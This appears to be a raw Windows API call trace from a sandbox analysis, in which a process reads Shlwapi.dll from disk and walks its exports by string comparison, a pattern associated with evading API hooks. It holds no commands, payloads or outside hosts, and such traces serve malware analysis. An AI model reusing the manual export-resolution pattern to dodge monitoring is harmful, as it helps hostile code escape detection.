lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0091.869] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0091.870] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0091.871] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0091.872] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0091.877] GetProcessHeap () returned 0x440000 [0091.877] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c75030 | out: hHeap=0x440000) returned 1 [0091.877] GetProcessHeap () returned 0x440000 [0091.877] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459380 [0091.877] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0091.878] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0091.878] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0091.878] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0091.878] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.878] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0091.878] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0091.878] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0091.878] GetProcessHeap () returned 0x440000 [0091.878] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x51148) returned 0x2c75030 [0091.879] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0091.879] ReadFile (in: hFile=0x17c, lpBuffer=0x2c75030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c75030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0091.888] CloseHandle (hObject=0x17c) returned 1 [0091.889] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0091.889] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0091.889] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0091.889] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0091.889] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0091.889] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0091.889] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0091.889] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0091.889] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0091.889] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0091.890] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0091.890] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0091.891] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0091.891] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0091.891] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0091.891] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0091.891] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0091.892] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0091.892] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0091.893] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0091.893] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0091.893] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0092.079] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0092.079] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0092.079] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0092.079] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0092.079] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0092.080] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0092.080] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0092.081] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0092.081] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0092.081] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0092.081] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0092.081] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0092.081] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0092.081] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0092.081] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0092.081] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0092.081] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0092.081] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0092.082] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0092.082] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0092.083] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0092.083] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0092.083] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0092.083] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0092.084] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0092.084] lstrcmpA 